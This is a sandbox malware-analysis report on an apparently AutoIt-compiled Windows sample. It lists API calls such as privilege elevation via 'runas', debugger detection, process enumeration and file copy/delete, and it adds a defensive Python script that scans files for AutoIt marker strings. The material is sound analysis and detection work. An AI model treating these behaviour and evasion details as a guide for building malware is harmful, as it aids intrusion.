• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
• String ID:
• API String ID: 2383988440-0
• Opcode ID: f352d12363942d86dc1bbd43c02191cd57d5fabd026ab4665ef0edff56f9f3c7
• Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
• Opcode Fuzzy Hash: f352d12363942d86dc1bbd43c02191cd57d5fabd026ab4665ef0edff56f9f3c7
• Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\LKxcbzlwkz.exe,00000104,?), ref: 00401F4C
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
• IsDebuggerPresent.KERNEL32 ref: 0040D5B6
• GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\LKxcbzlwkz.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
• SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
• SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
• GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
• ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
• String ID: C:\Users\user\Desktop\LKxcbzlwkz.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
• API String ID: 2495805114-1817776820
• Opcode ID: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
• Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
• Opcode Fuzzy Hash: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
• Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

Control-flow Graph

control_flow_graph 2423 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 2432 40e582-40e583 2423->2432 2433 427674-427679 2423->2433 2436 40e585-40e596 2432->2436 2437 40e5ba-40e5cb call 40ef60 2432->2437 2434 427683-427686 2433->2434 2435 42767b-427681 2433->2435 2439 427693-427696 2434->2439 2440 427688-427691 2434->2440 2438 4276b4-4276be 2435->2438 2441 427625-427629 2436->2441 2442 40e59c-40e59f 2436->2442 2450 40e5ec-40e60c 2437->2450 2451 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2437->2451 2452 4276c6-4276ca GetSystemInfo 2438->2452 2439->2438 2448 427698-4276a8 2439->2448 2440->2438 2444 427636-427640 2441->2444 2445 42762b-427631 2441->2445 2446 40e5a5-40e5ae 2442->2446 2447 427654-427657 2442->2447 2444->2437 2445->2437 2454 40e5b4 2446->2454 2455 427645-42764f 2446->2455 2447->2437 2453 42765d-42766f 2447->2453 2456 4276b0 2448->2456 2457 4276aa-4276ae 2448->2457 2459 40e612-40e623 call 40efd0 2450->2459 2460 4276d5-4276df GetSystemInfo 2450->2460 2451->2450 2466 40e5e8 2451->2466 2452->2460 2453->2437 2454->2437 2455->2437 2456->2438 2457->2438 2459->2452 2465 40e629-40e63f call 40ef90 GetNativeSystemInfo 2459->2465 2469 40e641-40e642 FreeLibrary 2465->2469 2470 40e644-40e651 2465->2470 2466->2450 2469->2470 2471 40e653-40e654 FreeLibrary 2470->2471 2472 40e656-40e65d 2470->2472 2471->2472
APIs
• GetVersionExW.KERNEL32(?), ref: 0040E52A
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
• GetNativeSystemInfo.KERNEL32(?), ref: 0040E632
• FreeLibrary.KERNEL32(?), ref: 0040E642
• FreeLibrary.KERNEL32(?), ref: 0040E654
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
• String ID: 0SH
• API String ID: 3363477735-851180471
• Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
• Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
• Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
• Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
• __wsplitpath.LIBCMT ref: 00475644
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcscat.LIBCMT ref: 00475657
• __wcsicoll.LIBCMT ref: 0047567B
• Process32NextW.KERNEL32(00000000,?), ref: 004756AB
• CloseHandle.KERNEL32(00000000), ref: 004756BA
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 2547909840-0
• Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
• Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
• Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
• Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
APIs
• OleInitialize.OLE32(00000000), ref: 0046CF63
• _wcslen.LIBCMT ref: 0046CF75
• CreateBindCtx.OLE32(00000000,?), ref: 0046D01F
• MkParseDisplayName.OLE32(?,?,?,?), ref: 0046D065
  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
  • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
• CLSIDFromProgID.OLE32(00000000,?,?), ref: 0046D10B
• GetActiveObject.OLEAUT32(?,00000000,?), ref: 0046D125
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Variant$Copy$ActiveBindClearCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcslen
• String ID:
• API String ID: 2728119192-0
• Opcode ID: 68f896165689c60a77b15e348e9bcd14568464d5554ec5ac4c2887339c93c3d6
• Instruction ID: 654cbfa1d8fefa06abeba6563afdd6e3d5f820db169d2b444807b365abf91408
• Opcode Fuzzy Hash: 68f896165689c60a77b15e348e9bcd14568464d5554ec5ac4c2887339c93c3d6
• Instruction Fuzzy Hash: 3D815E71604301ABD700EF65DC85F6BB3E8BF88704F10491EF64597291E775E905CB6A
APIs
• LoadLibraryA.KERNEL32(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: IsThemeActive$uxtheme.dll
• API String ID: 2574300362-3542929980
APIs
• GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
• FindFirstFileW.KERNEL32(?,?), ref: 004339D8
• FindClose.KERNEL32(00000000), ref: 004339EB
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
• InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 901099227-0
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00472C51
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
• Sleep.KERNEL32(0000000A,?), ref: 004094D1
• TranslateMessage.USER32(?), ref: 00409556
• DispatchMessageW.USER32(?), ref: 00409561
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                                                                                                                                                                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                                                                                                                                                            • API String ID: 1762048999-758534266
                                                                                                                                                                                                                                                            • Opcode ID: 9980c18296cc38a6d47203e1dc558ba7b68c36983024eec6b80bd2060408f93d
                                                                                                                                                                                                                                                            • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9980c18296cc38a6d47203e1dc558ba7b68c36983024eec6b80bd2060408f93d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                                                                                                                                                                                                            Control-flow Graph

• Graph image not reproduced. Basic blocks 452ac7-452f02. Win32 calls in the graph: DeleteFileW (blocks 452df9, 452e8a, 452ebd, 452ed9), CopyFileW (block 452ea6). Internal calls: 422240, 442c5a, 4150d1, 41313c, 452719, 413a0e, 411567, 411536, 414d04, 431e1f, 4149c2, 442bb4, 414a46, 431e9e, 431e71, 44b1a9, 432229, 4142b6, 442c29, 431ddb.
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                                                                                                                                                                                            • _fseek.LIBCMT ref: 00452B3B
                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00452BB0
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00452BC5
                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00452C07
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00452C1C
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452C53
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452C64
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452C83
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452C94
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452D78
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2054058615-0
                                                                                                                                                                                                                                                            • Opcode ID: efc87e589c62bcb95d86bbffa40c2e1c9392316a9786d64ec6d4328c26f8658a
                                                                                                                                                                                                                                                            • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efc87e589c62bcb95d86bbffa40c2e1c9392316a9786d64ec6d4328c26f8658a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66

                                                                                                                                                                                                                                                            Control-flow Graph

• Graph image not reproduced. Basic blocks 46e1a6-46e48a. No Win32 calls appear in the graph. Internal calls: 40c650, 4533eb, 445ae0, 45340c, 411567, 413e1f, 411536, 433998, 4111c1, 44bd27, 40f760, 403cd0, 408f40, 413a0e, 433784, 4339fa, 452ac7 (the CopyFileW/DeleteFileW routine listed above, reached from block 46e407), 431e58.
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                                                                                                                                                            • API String ID: 0-1896584978
                                                                                                                                                                                                                                                            • Opcode ID: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                                                                                                                                                                                                                            • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
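The String ID ">>>AUTOIT SCRIPT<<<" reported for the function at 46e1a6, together with the "@GUI_CTRLHANDLE", "@GUI_CTRLID" and "@GUI_WINHANDLE" macro names attached to the PeekMessageW/DispatchMessageW loop at 409266, is what an AutoIt3-compiled executable looks like in a string dump: AutoIt places that marker in front of the compiled script it embeds in the binary, and the macro names belong to the bundled interpreter. The triage script below is an added example, not part of the Joe Sandbox report and not code from the sample; it scans a file for those literal strings in both ASCII and UTF-16LE and reports where they occur. Only the strings themselves come from the report; the scanning logic, the verdict labels and the sample bytes are constructed for illustration.

```python
"""Triage check: does a PE carry an embedded AutoIt3 compiled script?

Added example, not part of the Joe Sandbox report. The marker strings are
the ones listed as String IDs in the report; everything else (scan logic,
verdict labels, SAMPLE bytes) is constructed here for illustration.
"""
import sys
from typing import Dict, List

# Literal strings taken from the report's String IDs.
AUTOIT_SCRIPT_MARKER = ">>>AUTOIT SCRIPT<<<"
AUTOIT_GUI_MACROS = ["@GUI_CTRLHANDLE", "@GUI_CTRLID", "@GUI_WINHANDLE"]


def _encodings(s: str) -> Dict[str, bytes]:
    # AutoIt3 is a Unicode build, so its strings are normally UTF-16LE in the
    # binary; the ASCII form is checked too so the scan is not encoding-sensitive.
    return {"ascii": s.encode("ascii"), "utf-16le": s.encode("utf-16-le")}


def find_marker_offsets(data: bytes, marker: str) -> List[int]:
    """Return every file offset at which `marker` occurs, in either encoding."""
    hits: List[int] = []
    for needle in _encodings(marker).values():
        start = 0
        while True:
            idx = data.find(needle, start)
            if idx < 0:
                break
            hits.append(idx)
            start = idx + 1
    return sorted(hits)


def triage_autoit(data: bytes) -> Dict[str, object]:
    """Summarise AutoIt indicators found in `data` (a whole file image)."""
    script_hits = find_marker_offsets(data, AUTOIT_SCRIPT_MARKER)
    macro_hits = {m: find_marker_offsets(data, m) for m in AUTOIT_GUI_MACROS}
    macros_present = sorted(m for m, offs in macro_hits.items() if offs)
    # The script marker is the strong indicator: it sits in front of the
    # embedded script. The GUI macro names only show that the AutoIt
    # interpreter is present, which is true of any compiled AutoIt binary.
    if script_hits:
        verdict = "autoit-compiled"
    elif macros_present:
        verdict = "autoit-runtime-strings"
    else:
        verdict = "no-autoit-indicators"
    return {
        "is_pe": data[:2] == b"MZ",
        "script_marker_offsets": script_hits,
        "gui_macros_present": macros_present,
        "verdict": verdict,
    }


# Constructed sample (not real file content): a bare MZ stub, one ASCII macro
# name at offset 64, then the script marker as UTF-16LE at offset 79.
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + b"@GUI_WINHANDLE\x00"
    + AUTOIT_SCRIPT_MARKER.encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 16
)

if __name__ == "__main__":
    # Usage: python autoit_triage.py <file>; with no argument the SAMPLE is scanned.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for key, value in triage_autoit(blob).items():
        print(f"{key}: {value}")
```

Run against the dropped or submitted executable to confirm the AutoIt indicators the report's string dump shows; a hit on the script marker means the compiled script can be recovered from the file for further analysis, which a string scan alone does not do.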

                                                                                                                                                                                                                                                             Control-flow Graph
                                                                                                                                                                                                                                                             • Function at 0046ED8E (basic blocks 46ed8e-46f3be); the rendered graph with its Executed / Not Executed colouring is not reproduced here. The API calls the graph shows (GetForegroundWindow, IsWindow, GetDesktopWindow, EnumChildWindows, EnumWindows) are the ones listed under APIs.
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0046EE79
                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0046F265
                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 0046F29A
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0046F356
